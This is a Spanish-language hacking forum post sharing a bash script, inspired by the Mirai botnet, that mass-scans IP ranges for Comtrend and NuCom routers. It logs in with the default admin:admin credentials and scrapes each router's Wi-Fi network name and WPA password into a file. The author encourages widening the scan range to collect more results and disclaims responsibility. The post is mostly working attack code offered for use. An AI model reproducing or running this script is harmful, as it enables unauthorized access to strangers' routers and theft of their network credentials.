Bienvenidos al nuevo foro de hackplayers. En caso de encontrarse cualquier tipo de error, contacte con cualquier administrador por mensaje privado.
Recuerda que, para incrementar tu privacidad, tambien puedes acceder al foro usando el dominio forohpysho2t5mjs.onion de la red tor.
Recuerda que, para incrementar tu privacidad, tambien puedes acceder al foro usando el dominio forohpysho2t5mjs.onion de la red tor.
routers con credenciales por defecto
Como primer post, omitiendo la presentacion, claro esta, quiero compartir este script en bash.
La idea me surgio a partir de la importancia que estan tomando el tema IoT y la botnet Mirai.
Comenze comprobando mi router, y poco a poco fui ampliando el rango de IP's.
como se puede apreciar es un "trabajo" de fin de semana, es muy mejorable, principalmente la salida.
Para los mas nuevos en el OS linux, daros unos consejos. ejecutar como root, los archivos deben existir, masscan, nmap y curl crean el archivo de salida pero los otros no seran creados. (micro_httpd.txt, Comtrend.txt, NuCom.txt, CALVES.txt).
Si cambiamos el rango de escaneo de masscan, podemos aumentar los resultados.
Quiero decir que eludo cualquier responsabilidad sobre el uso inadecuado de este codigo.
un saludo y no ser malos.
La idea me surgio a partir de la importancia que estan tomando el tema IoT y la botnet Mirai.
Comenze comprobando mi router, y poco a poco fui ampliando el rango de IP's.
como se puede apreciar es un "trabajo" de fin de semana, es muy mejorable, principalmente la salida.
Para los mas nuevos en el OS linux, daros unos consejos. ejecutar como root, los archivos deben existir, masscan, nmap y curl crean el archivo de salida pero los otros no seran creados. (micro_httpd.txt, Comtrend.txt, NuCom.txt, CALVES.txt).
Si cambiamos el rango de escaneo de masscan, podemos aumentar los resultados.
Quiero decir que eludo cualquier responsabilidad sobre el uso inadecuado de este codigo.
un saludo y no ser malos.
#!/bin/bash
masscan 192.168.1.0/24 -p80 --open-only --rate=1000 | awk '{print$6}' > ./output/ip_activas.txt
nmap -iL ./output/ip_activas.txt -p 80 -sV -sS -vv -Pn -T5 -oG - | grep 'open' | grep -v 'tcpwrapped' > ./output/80_open.txt
cat 80_open.txt | grep 'micro_httpd' | awk '{print$2}' >> micro_httpd.txt
for line in $(cat micro_httpd.txt)
do
timeout 5 curl -sL -w "%{http_code}\n" $line -o /dev/null && echo $line
if [ code = 401 ]
then
echo $line >> Comtrend.txt
else
echo $line >> NuCom.txt
fi
done
#login NuCom.txt
for IP in $(cat NuCom.txt)
do
var=$(timeout 5 curl -sL -w "%{http_code}\n" "$IP" -o /dev/null) #si en 5 sg no da respuesta salta a otro
if [ $var = 200 ] #si responde con 200, esta activo
then
echo -e "\e[1;36m"$IP"\e[0m" #imprime la ip
curl -c cook "http://"$IP"/login.cgi?username=admin&psd=admin" -o /dev/null #crea/captura coolie
curl -b cook "http://"$IP"/wlsecurity.html" | grep -e "<option value='0'>" -e "wpaPskKey" >> CALVES.txt #usa cookie para extraer essid y pass
fi
done
#login comtrend
for line in $(cat listaIP.txt)
do
timeout 5 curl -u admin:admin "$line"/wlsecurity.html | grep -e "<option value='0'>" -e "var wpaPskKey =" && echo -e "\e[1;36m$line\e[0m"
done
Accede o Regístrate para comentar.